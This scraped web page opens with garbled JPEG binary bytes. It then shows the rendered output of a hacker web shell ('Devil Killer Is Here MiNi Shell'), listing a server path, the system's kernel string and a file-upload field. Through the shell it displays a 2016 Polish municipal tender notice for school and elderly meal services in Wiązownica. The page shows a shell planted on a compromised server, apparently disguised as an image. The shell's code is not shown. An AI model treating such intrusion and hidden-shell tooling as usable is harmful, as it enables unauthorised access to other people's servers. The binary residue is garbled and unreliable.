JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160818/301566-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 301566 - 2016
              z dnia 2016-08-18 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wiązownica: DOŻYWIANIE UCZNIÓW SZKÓŁ PODSTAWOWYCH I GIMNAZJUM W ROKU SZKOLNYM  2016/2017 ORAZ OSÓB STARSZYCH, CHORYCH,  SAMOTNYCH I NIEPEŁNOSPRAWNYCH NA TERENIE GMINY WIĄZOWNICA.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wójt Gminy Wiązownica, krajowy numer identyfikacyjny
              55167400000, ul.
              Wiązownica 
              208,
              37522  
              Wiązownica, woj.
              podkarpackie, państwo
              , tel.
              016 622-36-31, e-mail
              , faks
              .
              <br />
              Adres strony internetowej (URL): www. wiazownica.com<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Gminny Ośrodek Pomocy Społecznej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.bip.wiazownica.com</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć na adres Zamawiającego osobiście, drogą pocztową lub przesyłką kurierską.<br />
                Adres:
                <br />GOPS Wiązownica, ul. Warszawska 15,  37-22 Wiązownica</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>DOŻYWIANIE UCZNIÓW SZKÓŁ PODSTAWOWYCH I GIMNAZJUM W ROKU SZKOLNYM  2016/2017 ORAZ OSÓB STARSZYCH, CHORYCH,  SAMOTNYCH I NIEPEŁNOSPRAWNYCH NA TERENIE GMINY WIĄZOWNICA.<br /><b>Numer referencyjny: </b>IZ.271.16.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />3<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>W ramach planowanego zadania przewiduje się świadczenie usług w zakresie dożywiania uczniów szkół podstawowych i gimnazjum w roku szkolnym  2016/2017 oraz osób starszych, chorych,  samotnych i niepełnosprawnych na terenie gminy Wiązownica w formie gorących posiłków.

4.1. PRZEDMIOT ZAMÓWIENIA ZOSTAŁ PODZIELONY NA 3 ODRĘBNE CZĘŚCI (ZADANIA).
         CZĘŚĆ (ZADANIE) NR 1 
Przygotowanie i wydawanie obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla uczniów szkoły podstawowej i gimnazjum w Wiązownicy oraz przygotowanie i dowóz obiadów do szkół podstawowych w Manasterzu, Radawie i Cetuli.
        CZĘŚĆ (ZADANIE)  NR 2 
Przygotowanie i wydawanie obiadów w stołówce szkolnej  w Zapałowie dla uczniów szkoły podstawowej i gimnazjum w Zapałowie oraz przygotowanie i dowóz obiadów do szkoły podstawowej w Ryszkowej Woli.
        CZĘŚĆ (ZADANIE)  NR 3
Przygotowanie oraz dowóz obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla osób starszych, chorych,  samotnych i niepełnosprawnych z terenu gminy Wiązownica.
4.2. Wykonawca ponosi pełną odpowiedzialność za jakość i zgodność z warunkami jakościowymi  
       przygotowywanych posiłków, opisanymi w przedmiocie zamówienia. 
4.3. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę  podczas 
       wykonywania przedmiotu zamówienia. 
4.4. Wykonawca zobowiązany jest  do przygotowania, wydawania i dostarczania posiłków o   
       najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa.
4.5. Ciepły posiłek musi odpowiadać normom odżywczym obowiązującym w tzw. punktach    
       zbiorowego żywienia tj. posiłki winny być przygotowane zgodnie z zasadami racjonalnego 
       żywienia, sporządzone z pełnowartościowych, świeżych artykułów spożywczych, 
       posiadających aktualne terminy ważności. 
4.6. Wykonawca gwarantuje wysoką jakość dostarczanego produktu, terminowość dostaw oraz      
       zgodność z obowiązującymi normami i wymogami sanitarnymi.
4.7. Wykonawca jest zobowiązany do sprzedaży posiłków uczniom nie objętym niniejszym 
       zamówieniem w cenie równej jaką podał w ofercie (samodzielnie wykupującym posiłki). 
4.8. Obiady powinny odpowiadać następującym kryteriom:
- zawartość energii  850 kcal;
- udział energii z białka  nie mniej niż 12% wartości energetycznej posiłku;
- udział białka zwierzęcego  średnio 50% ogólnej ilości białka zawartego w posiłku;
- udział energii z tłuszczu  do 30%.
      Przewidywana dzienna ilość posiłków do wydania wynosi:
      dla części I  -    90 porcji  pełnych obiadów,
                              40 porcji obiady jednodaniowe 
      dla części II  - 120 porcji  pełnych obiadów,
                              20 porcji obiady jednodaniowe
      dla części III     12 porcji obiady 2 daniowe
Szczegółowy przedmiot zamówienia został określony w zał. nr 2 do SIWZ.
5. Sposób przygotowywania obiadów:
5.1. Pod pojęciem obiadów jednodaniowych należy rozumieć (trzy razy w tygodniu drugie danie -   
       poniedziałek, środka, piątek; dwa razy w tygodniu pożywna zupa- wtorek, czwartek). Pod 
       pojęciem pożywna zupa należy rozumieć zupę z tzw. mięsną wkładką podaną ze świeżym 
       pieczywem bez ograniczenia ilościowego. 
5.2. Pod pojęciem  obiadu 2-daniowego należy rozumieć pełny obiad składający się z zupy oraz  
       drugiego dania. 
5.2. Zupy należy przygotować na wywarach jarskich (warzywnych) lub mięsnych z dodatkiem  głównego składnika. Zupy na wywarach  z kości w ograniczonych ilościach.
5.3. Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażka. Przeciętna waga 1 porcji zupy  400 g.
5.4. Drugie danie - powinno składać się z produktów białkowych, najlepiej pochodzenia zwierzęcego (mięso, ryby, drób) produktów bogatych w węglowodany złożone (ziemniaki, kasza, ryż, makaron, kluski itp.) oraz dodatków warzywnych (surówki, warzywa gotowane).
5.5 Zamawiający oczekuje, iż Wykonawca będzie przygotowywał posiłki zgodnie z zalecanym modelem żywienia o charakterze pro zdrowotnym poprzez:
- stosowanie tłuszczów roślinnych;
- ograniczone stosowanie tłuszczów zwierzęcych;
- umiarkowane stosowanie mięsa czerwonego;
- stosowanie mięsa drobiowego;
- stosowanie ryb;
- umiarkowane stosowanie jaj, cukru i soli;
- duży udział warzyw i owoców w posiłkach, w tym także nasion roślin strączkowych.
5.6. Napój  w ilości 200 ml (kompot, herbata).
5.7. Obiady dowożone 1-daniowe, zamiennie w takiej samej ilości zupa o zwiększonej kaloryczności z pieczywem i drugie danie bez napoju.
5.8. Do przygotowywania posiłków należy używać produktów wysokiej jakości, posiadających aktualne terminy ważności.
5.9. Zamawiający nie dopuszcza możliwości serwowania posiłków  na bazie Fastwood.
5.10. Zamawiający zastrzega sobie prawo do przeprowadzenia badań sprawdzających jakość przygotowywanych posiłków pod względem  kaloryczności, gramatury itp.  
5.11. Zamawiający zabezpiecza naczynia ceramiczne dla potrzeb wydawania posiłków wyłącznie w 
       stołówce gimnazjum w Zapałowie i Wiązownicy, natomiast w zakresie obiadów dowożonych 
       do szkół podstawowych, Wykonawca zabezpieczy termosy i własny środek transportu 
       przystosowany do przewozu żywności, spełniający przy tym wszelkie wymogi sanitarno-
       higieniczne oraz jednorazowe naczynia i sztućce do wydawania posiłków.
       Długość tras dowozu posiłków wynosi:
Część I 
1. Wiązownica - SP Manasterz-Wiązownica = 14 km. 
2. Wiązownica - SP Radawa-Wiązownica = 16 km. 
3. Wiązownica - SP Cetula-Wiązownica = 22 km. 
Część II
1. Zapałów - Szkoła Podstawowa w Ryszkowej Woli - 9 km.
Część III
Wiązownica  Manasterz 14 km,
Wiązownica  Mołodycz 36 km.
Wiązownica  Cetula 22 km.
Wiązownica  Surmaczówka 45
Wiązownica  Wólka Zapałówska 44
Wiązownica  Szówsko 20 km.
6. Warunki przygotowania posiłków:
6.1. Posiłki będą przygotowane w pomieszczeniach kuchni, wyposażonej w podstawowe urządzenia i sprzęt gastronomiczny, niezbędny do przygotowania i wydawania posiłków, które zostaną użyczone bezpłatnie Wykonawcy na podstawie protokołu zdawczo  odbiorczego, wyłącznie do prowadzenia usługi dożywianie stanowiącej przedmiot zamówienia. Wykonawca nie może wykorzystywać przekazanych w użyczenie pomieszczeń i sprzętu gastronomicznego do innych celów ponad stanowiące przedmiot zamówienia.
       Wykonawca   będzie  ponosił   pełną  odpowiedzialność   materialną  za  oddane                     
       pomieszczenia i wyposażenie tych pomieszczeń oraz zobowiązuje się do ponoszenia kosztów 
       ewentualnych napraw sprzętu i urządzeń powstałych w wyniku zwykłego użytkowania.
6.2. Wykonawca będzie pokrywał koszty zużycia gazu i energii elektrycznej i wywozu nieczystości stałych. W zamian za sprzątanie  kuchni i stołówki Zamawiający zabezpieczy bezpłatnie dostawę bieżącej wody wraz z odprowadzeniem ścieków.
6.3. Wykonawca będzie ponosił pełną odpowiedzialność materialną za oddane w użyczenie pomieszczenia i wyposażenie tych pomieszczeń.
6.4. Posiłki będą kupowane przez uczniów gimnazjum oraz szkół podstawowych, dofinansowane z budżetu  gminy.
6.5. Posiłki wydawane będą w dniach nauki szkolnej, w roku szkolnym 2015/2016.
6.6. Zamawiający zastrzega sobie możliwość zmiany liczby posiłków w zależności od zaistniałych potrzeb. W przypadku zmniejszenia zapotrzebowania wykonawcy nie będzie przysługiwać  wynagrodzenie za nie zrealizowaną usługę.
6.7. Wykonawca zobowiązany jest do zawarcia umowy na odbiór i unieszkodliwianie odpadów 
       pokonsumpcyjnych.
6.8. Posiłki Wykonawca dostarczać będzie własnym  środkiem transportu przystosowanym do 
       przewozu   żywności,  spełniając    przy   tym   wszelkie   wymogi   sanitarno - higieniczne
       w specjalistycznych termosach gwarantujących utrzymanie odpowiedniej ochrony, temperatury 
       oraz jakości przewożonych posiłków. 
       Harmonogram dostarczania oraz miejsce wydawania posiłków Wykonawca ustali bezpośrednio 
       z Dyrektorami poszczególnych szkół.

UWAGA: Zamawiający informuje, że postępowanie prowadzone będzie zgodnie z uregulowaniami określonymi w art. 24aa ustawy Pzp. wg. tzw.  procedury odwróconej. 
Oznacza to, że zamawiający,  w prowadzonym postępowaniu w trybie przetargu nieograniczonego, 
najpierw  dokona oceny złożonych ofert pod kątem przesłanek, określonych w art. 89 ust. 1 ustawy Pzp. (odrzucenia oferty), oraz kryteriów oceny ofert opisanych w SIWZ, a następnie w odniesieniu do wykonawcy, którego oferta została oceniona jako najkorzystniejsza, dokona oceny podmiotowej wykonawcy, wzywając wykonawcę do przedłożenia oświadczeń lub dokumentów w trybie art. 26 ust. 1 pkt. 2 ustawy Pzp. na potwierdzenie, czy wykonawca  nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.
<br /><br /><b>II.5) Główny kod CPV: </b>55321000-6<br /><b> Dodatkowe kody CPV:</b>55524000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony, jeżeli w okresie ostatnich 3 lat przed upływem  terminu 
       składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie należycie 
       wykonał, a w przypadku świadczeń okresowych również należycie wykonywanych,  co  
       najmniej 1 usługę w zakresie  zbiorowego żywienia (dożywiania dzieci lub osób)  o wartości 
       min. 100 000 zł.(dla  części Nr 1 lub 2), i o wartości min. 20 000 zł. (dla części nr 3) lub o 
       wartości min. 200 000 zł.  na cały przedmiot zamówienia  wszystkie części ) odpowiadającej 
       przedmiotowi zamówienia, z podaniem ich wartości, daty wykonania i  podmiotów na rzecz 
       których usługi zostały wykonane,  oraz załączeniem  dowodów, czy zostały wykonane 
       należycie.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt. 1 ustawy Pzp, wystawione nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert,
      W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa 
           każdy z Wykonawców oddzielnie.
2)	aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego potwierdzające, że 
        	wykonawca nie zalega z opłacaniem podatków i opłat, lub potwierdzenia, że uzyskał 
        	przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 
        	lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie 
        	wcześniej niż 3 miesiące  przed upływem terminu  składania ofert;
       	W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa 
        	każdy z Wykonawców oddzielnie.
3)	aktualne zaświadczenie  właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia 
        	Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na 
        	ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem  
        	zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
        	wykonania  decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed 
        	upływem terminu  składania ofert;
        	W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa 
         	każdy z Wykonawców oddzielnie.
4)	oświadczenie wykonawcy o przynależności lub braku przynależności do tej samej grupy kapitałowej. 
	W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa 
         	każdy z Wykonawców oddzielnie.
W przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia  konkurencji w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez ten podmiot. 
Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze, wykonawca nie jest w stanie uzyskać tych dokumentów- oświadczenie wykonawcy.
W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
      W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten może  
      być złożony wspólnie.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">- 	formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1;
- 	kosztorys ofertowy w formie uproszczonej;
- 	parafowany projekt umowy  - zał. nr 3,
